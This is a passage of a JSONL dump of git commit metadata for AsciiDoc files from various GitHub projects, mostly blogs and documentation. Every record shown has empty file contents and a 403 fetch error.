2019-03-10-And-thats-an-Email.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2019-03-10-And-thats-an-Email.adoc","new_file":"_posts\/2019-03-10-And-thats-an-Email.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a356230f6950956debc7ee1c9d949e1eb2af7ceb","subject":"doc(CHANGELOG): init file","message":"doc(CHANGELOG): init file\n","repos":"Git-Host\/Git-Host.io,TheAshwanik\/new,TheAshwanik\/new,alchapone\/alchapone.github.io,TheAshwanik\/new,Git-Host\/Git-Host.io,anthonny\/dev.hubpress.io,lametaweb\/lametaweb.github.io,demo-hubpress\/demo-hubpress.github.io,anthonny\/dev.hubpress.io,alchapone\/alchapone.github.io,demo-hubpress\/demo-hubpress.github.io,demo-hubpress\/demo-hubpress.github.io,lametaweb\/lametaweb.github.io,demo-hubpress\/demo-hubpress.github.io,anthonny\/dev.hubpress.io,demo-hubpress\/demo-hubpress.github.io,TheAshwanik\/new,anthonny\/dev.hubpress.io,Git-Host\/Git-Host.io,anthonny\/dev.hubpress.io,lametaweb\/lametaweb.github.io,alchapone\/alchapone.github.io","old_file":"docs\/CHANGELOG.adoc","new_file":"docs\/CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/demo-hubpress\/demo-hubpress.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a0638826cbd006c081992ee3e1a9b511d2c928ca","subject":"Update 2016-09-24-Pumpkin-Smoothie-Jar.adoc","message":"Update 2016-09-24-Pumpkin-Smoothie-Jar.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-09-24-Pumpkin-Smoothie-Jar.adoc","new_file":"_posts\/2016-09-24-Pumpkin-Smoothie-Jar.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f27f9848bb56a4215ca57c72acdad85b02bdc3db","subject":"Update 2017-07-10-Azure-Functions-with.adoc","message":"Update 2017-07-10-Azure-Functions-with.adoc","repos":"dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io,dannylane\/dannylane.github.io","old_file":"_posts\/2017-07-10-Azure-Functions-with.adoc","new_file":"_posts\/2017-07-10-Azure-Functions-with.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dannylane\/dannylane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36b71d2c5a6833da27db8c23be5180faaaad04ab","subject":"[website] broken link to an adoc","message":"[website] broken link to an adoc\n\nChange-Id: I8fe88073807eceb8927d6ca7ddf109bd0a9fd9d3\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4504\nReviewed-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nTested-by: Kudu Jenkins\n","repos":"andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0177dd262167e2fda3661e80b00beaaa1237f3db","subject":"Added Threading Model to Docs","message":"Added Threading Model to Docs\n","repos":"davidkarlsen\/camel,apache\/camel,cunningt\/camel,ullgren\/camel,Fabryprog\/camel,pax95\/camel,tdiesler\/camel,cunningt\/camel,ullgren\/camel,christophd\/camel,objectiser\/camel,pax95\/camel,pax95\/camel,onders86\/camel,tdiesler\/camel,alvinkwekel\/camel,kevinearls\/camel,adessaigne\/camel,ullgren\/camel,nicolaferraro\/camel,mcollovati\/camel,onders86\/camel,CodeSmell\/camel,punkhorn\/camel-upstream,nikhilvibhav\/camel,christophd\/camel,adessaigne\/camel,objectiser\/camel,gnodet\/camel,mcollovati\/camel,adessaigne\/camel,tdiesler\/camel,tadayosi\/camel,zregvart\/camel,pax95\/camel,christophd\/camel,tadayosi\/camel,tdiesler\/camel,kevinearls\/camel,kevinearls\/camel,objectiser\/camel,apache\/camel,kevinearls\/camel,pmoerenhout\/camel,tadayosi\/camel,tadayosi\/camel,cunningt\/camel,pmoerenhout\/camel,DariusX\/camel,onders86\/camel,christophd\/camel,Fabryprog\/camel,DariusX\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,alvinkwekel\/camel,christophd\/camel,nicolaferraro\/camel,gnodet\/camel,Fabryprog\/camel,kevinearls\/camel,cunningt\/camel,pmoerenhout\/camel,tadayosi\/camel,Fabryprog\/camel,alvinkwekel\/camel,apache\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,onders86\/camel,DariusX\/camel,mcollovati\/camel,adessaigne\/camel,davidkarlsen\/camel,zregvart\/camel,DariusX\/camel,nikhilvibhav\/camel,gnodet\/camel,mcollovati\/camel,CodeSmell\/camel,nicolaferraro\/camel,ullgren\/camel,pax95\/camel,gnodet\/camel,apache\/camel,kevinearls\/camel,tdiesler\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,onders86\/camel,onders86\/camel,apache\/camel,tdiesler\/camel,cunningt\/camel,davidkarlsen\/camel,gnodet\/camel,cunningt\/camel,adessaigne\/camel,punkhorn\/camel-upstream,tadayosi\/camel,christophd\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,CodeSmell\/camel,apache\/camel,zregvart\/camel,adessaigne\/camel,CodeSmell\/camel,nicolaferraro\/camel,pax95\/camel,zregvart\/camel,objectiser\/camel,pmoerenhout\/camel","old_file":"docs\/user-manual\/en\/threading-model.adoc","new_file":"docs\/user-manual\/en\/threading-model.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bea9d90b9e39fd9f9cf9ffe8ec5a1cc7a8a0e733","subject":"y2b create post OtterBox Defender iPad 3 Case Unboxing (The New iPad Case)","message":"y2b create post OtterBox Defender iPad 3 Case Unboxing (The New iPad Case)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-03-26-OtterBox-Defender-iPad-3-Case-Unboxing-The-New-iPad-Case.adoc","new_file":"_posts\/2012-03-26-OtterBox-Defender-iPad-3-Case-Unboxing-The-New-iPad-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1314851196db469d1c31503e7ca4e042530da550","subject":"create post OnePlus 5T Limited Edition Unboxing + Easter Egg","message":"create post OnePlus 5T Limited Edition Unboxing + Easter Egg","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-OnePlus-5T-Limited-Edition-Unboxing-+-Easter-Egg.adoc","new_file":"_posts\/2018-02-26-OnePlus-5T-Limited-Edition-Unboxing-+-Easter-Egg.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f75c28b34c18401c0162e42a3885913d6e45ce4f","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/showdown.asciidoc","new_file":"_brainstorms\/showdown.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1cc2c445f7b8d04d386b9cd78a40ba3074aa325f","subject":"Adding Spring Rest Docs","message":"Adding Spring Rest Docs\n\nFixes #15\n","repos":"rajadileepkolli\/POC,rajadileepkolli\/POC,rajadileepkolli\/POC,rajadileepkolli\/POC","old_file":"spring-boot-rest\/poc-spring-boot-rest-application\/src\/main\/asciidoc\/index.adoc","new_file":"spring-boot-rest\/poc-spring-boot-rest-application\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rajadileepkolli\/POC.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f158ab62a331105eef6ab1fd035061a4a5d2f8dc","subject":"DELTASPIKE-807 - Update external resources","message":"DELTASPIKE-807 - Update external resources\n","repos":"Danny02\/deltaspike,tremes\/deltaspike,danielsoro\/deltaspike,mlachat\/deltaspike,subaochen\/deltaspike,chkal\/deltaspike,struberg\/deltaspike,rdicroce\/deltaspike,chkal\/deltaspike,os890\/deltaspike-vote,os890\/DS_Discuss,chkal\/deltaspike,apache\/deltaspike,danielsoro\/deltaspike,Danny02\/deltaspike,mlachat\/deltaspike,tremes\/deltaspike,subaochen\/deltaspike,os890\/deltaspike-vote,Danny02\/deltaspike,danielsoro\/deltaspike,os890\/DS_Discuss,os890\/deltaspike-vote,Danny02\/deltaspike,idontgotit\/deltaspike,mlachat\/deltaspike,idontgotit\/deltaspike,tremes\/deltaspike,danielsoro\/deltaspike,struberg\/deltaspike,apache\/deltaspike,tremes\/deltaspike,rdicroce\/deltaspike,idontgotit\/deltaspike,os890\/deltaspike-vote,struberg\/deltaspike,idontgotit\/deltaspike,subaochen\/deltaspike,subaochen\/deltaspike,mlachat\/deltaspike,apache\/deltaspike,rdicroce\/deltaspike,struberg\/deltaspike,apache\/deltaspike,rdicroce\/deltaspike,chkal\/deltaspike,os890\/DS_Discuss,os890\/DS_Discuss","old_file":"site\/src\/main\/asciidoc\/external.adoc","new_file":"site\/src\/main\/asciidoc\/external.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Danny02\/deltaspike.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e3a7c05cdbe2c0b0f5c2b5096200b03499eb348","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"marbon87\/spring-cloud-config,marbon87\/spring-cloud-config,spring-cloud\/spring-cloud-config,spring-cloud\/spring-cloud-config,marbon87\/spring-cloud-config,spring-cloud\/spring-cloud-config","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-config.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"90d63bae03405fd18e057a06447a1b55a914e276","subject":"Update 2015-11-11-Migrate-blog-from-wordpress-to-gihubp-pages-with-hubpress.adoc","message":"Update 2015-11-11-Migrate-blog-from-wordpress-to-gihubp-pages-with-hubpress.adoc","repos":"javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io","old_file":"_posts\/2015-11-11-Migrate-blog-from-wordpress-to-gihubp-pages-with-hubpress.adoc","new_file":"_posts\/2015-11-11-Migrate-blog-from-wordpress-to-gihubp-pages-with-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/javathought\/javathought.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b61e7e6534453c0ab1881d28e6401d9dbda6e27a","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fa6c9ecdf5f722eb574affbee86f7374ed95f1f","subject":"Update 2016-12-23-TEMPLATE.adoc","message":"Update 2016-12-23-TEMPLATE.adoc","repos":"iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io","old_file":"_posts\/2016-12-23-TEMPLATE.adoc","new_file":"_posts\/2016-12-23-TEMPLATE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iamthinkking\/iamthinkking.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e798a173221f105122c3c3a375d0f8afabb52732","subject":"Delete 2018-01-20-Bitrise.adoc","message":"Delete 2018-01-20-Bitrise.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-20-Bitrise.adoc","new_file":"_posts\/2018-01-20-Bitrise.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6746adff7b98f814e402a85ef2d2603c8d46df2a","subject":"Update 2018-11-11-Vuejs-3.adoc","message":"Update 2018-11-11-Vuejs-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44c5b9c0626b48a51aa74a46da392ce8b3fdc0fe","subject":"Create 2015-01-15-forge-2.13.1.final.asciidoc","message":"Create 2015-01-15-forge-2.13.1.final.asciidoc","repos":"luiz158\/docs,agoncal\/docs,forge\/docs,forge\/docs,luiz158\/docs,addonis1990\/docs,addonis1990\/docs,agoncal\/docs","old_file":"news\/2015-01-15-forge-2.13.1.final.asciidoc","new_file":"news\/2015-01-15-forge-2.13.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e0f03a02f3ad6729bf7f5a7bf892abd39ec23106","subject":"Update 2018-02-09-Getting-started-to-develop-on-IOTA.adoc","message":"Update 2018-02-09-Getting-started-to-develop-on-IOTA.adoc","repos":"cmolitor\/blog,cmolitor\/blog,cmolitor\/blog,cmolitor\/blog","old_file":"_posts\/2018-02-09-Getting-started-to-develop-on-IOTA.adoc","new_file":"_posts\/2018-02-09-Getting-started-to-develop-on-IOTA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmolitor\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f3de45231a16bc15a699ce8ff56d22d247a0ce12","subject":"Renamed '_posts\/2019-06-31-Kafka-integration-tests.adoc' to '_posts\/2019-07-3-Kafka-integration-tests.adoc'","message":"Renamed '_posts\/2019-06-31-Kafka-integration-tests.adoc' to '_posts\/2019-07-3-Kafka-integration-tests.adoc'","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2019-07-3-Kafka-integration-tests.adoc","new_file":"_posts\/2019-07-3-Kafka-integration-tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65a970b441f3411b4323df2e11b0e5a1710fc087","subject":"Common help with Grails","message":"Common help with Grails\n","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-helpWithGrails.adoc","new_file":"src\/main\/docs\/common-helpWithGrails.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"741389153f5ba3509738feff98246999cbc9dacc","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"M3lkior\/gravitee-management-webui,lauthieb\/gravitee-management-webui,lauthieb\/gravitee-management-webui,gravitee-io\/gravitee-management-webui,gravitee-io\/gravitee-management-webui,gravitee-io\/gravitee-management-webui,lauthieb\/gravitee-management-webui,M3lkior\/gravitee-management-webui","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/M3lkior\/gravitee-management-webui.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6827a463e21f2df943e4fc62c14367bececa8602","subject":"y2b create post Asus Eee Pad Transformer Unboxing \\u0026 Overview","message":"y2b create post Asus Eee Pad Transformer Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-08-11-Asus-Eee-Pad-Transformer-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-08-11-Asus-Eee-Pad-Transformer-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e83b871d018cd1b7df69f135872e8c54006b014","subject":"Refs Objs interf","message":"Refs Objs interf\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e8d4a092b8477fb2c432493e93a62a3c9345a7d","subject":"Update 2016-02-12-The-start.adoc","message":"Update 2016-02-12-The-start.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-The-start.adoc","new_file":"_posts\/2016-02-12-The-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ffd5c787b302545404a176a190f22f52afe09c8","subject":"Added links to api doc","message":"Added links to api doc\n","repos":"michel-kraemer\/web-site,michel-kraemer\/web-site,michel-kraemer\/web-site,kevinbayes\/vertx-web-site,woorea\/vertx-web-site,vert-x3\/vertx-web-site,kevinbayes\/vertx-web-site,cazacugmihai\/vertx-web-site,vietj\/vertx,karianna\/vertx-web-site,cescoffier\/web-site,woorea\/vertx-web-site,vietj\/vertx,cazacugmihai\/vertx-web-site,vert-x3\/vertx-web-site,karianna\/vertx-web-site,karianna\/vertx-web-site,vert-x3\/vertx-web-site,kevinbayes\/vertx-web-site,vietj\/vertx,woorea\/vertx-web-site,cescoffier\/web-site,cazacugmihai\/vertx-web-site,cescoffier\/web-site","old_file":"src\/main\/asciidoc\/manual.adoc","new_file":"src\/main\/asciidoc\/manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vert-x3\/vertx-web-site.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73507cb5e3d1c8d6ad1e712050f66cb5452d7aef","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"44e584d75eb21b980a753ca4b2156fa70b5c635e","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd9d8939ca158bbf18e85f000a54a9dc44846d40","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be8441f131fc4bdfab629e399b9b3a491ed27810","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80637149a5de96b8c0021a48dbe090243dfd511c","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8db4f19c8c4b878b342c74e2d7e1126d26092850","subject":"Add Changelog","message":"Add Changelog\n","repos":"zhangwei0181\/ldap-passwd-webui,jirutka\/change-password","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jirutka\/change-password.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ae0635e0ec65b5a8e76d408481c01c4d3519ece","subject":"Update docs","message":"Update docs\n","repos":"laosdirg\/base,laosdirg\/base,laosdirg\/base","old_file":"docs\/docker.asciidoc","new_file":"docs\/docker.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/laosdirg\/base.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"199fce7b30b2d17289d78fd614d57f85c27ba7d4","subject":"Added warning on cosineSimilarity() for situations when the calculation should not be used. (#423)","message":"Added warning on cosineSimilarity() for situations when the calculation should not be used. (#423)\n\n","repos":"inserpio\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures","old_file":"docs\/similarity.adoc","new_file":"docs\/similarity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/larusba\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"828c85fdb3d7e70ab3c44e47c6db013e93cd50ce","subject":"Update Asciidoctor.adoc","message":"Update Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25d1b1ad464445dff41640f5f72528a2c8653744","subject":"CL: merging paths","message":"CL: merging paths\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5f1dcaddcc61b22cf39dfa373931693e5be7913c","subject":"Remove redundant characters","message":"Remove redundant characters\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"543d28cf5171a9476a54ab40b42c6429d3356b97","subject":"refactor: better wording","message":"refactor: better wording\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"b731cb0d9d2bdaa155329bb58fced3822307f7bc","subject":"changes","message":"changes\n","repos":"frans-fuerst\/thinks,frans-fuerst\/thinks,frans-fuerst\/thinks","old_file":"content\/available\/2015-04-01-13-mind.asciidoc","new_file":"content\/available\/2015-04-01-13-mind.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/frans-fuerst\/thinks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"96ec872aa0b05d141a5c7cd48b711c1fedd343e2","subject":"Update 2015-05-01-Post.adoc","message":"Update 2015-05-01-Post.adoc","repos":"pointout\/pointout.github.io,pointout\/pointout.github.io,pointout\/pointout.github.io","old_file":"_posts\/2015-05-01-Post.adoc","new_file":"_posts\/2015-05-01-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pointout\/pointout.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e461067cef8fb95380c0517824b7803d79bf92bd","subject":"Update 2016-03-23-Test.adoc","message":"Update 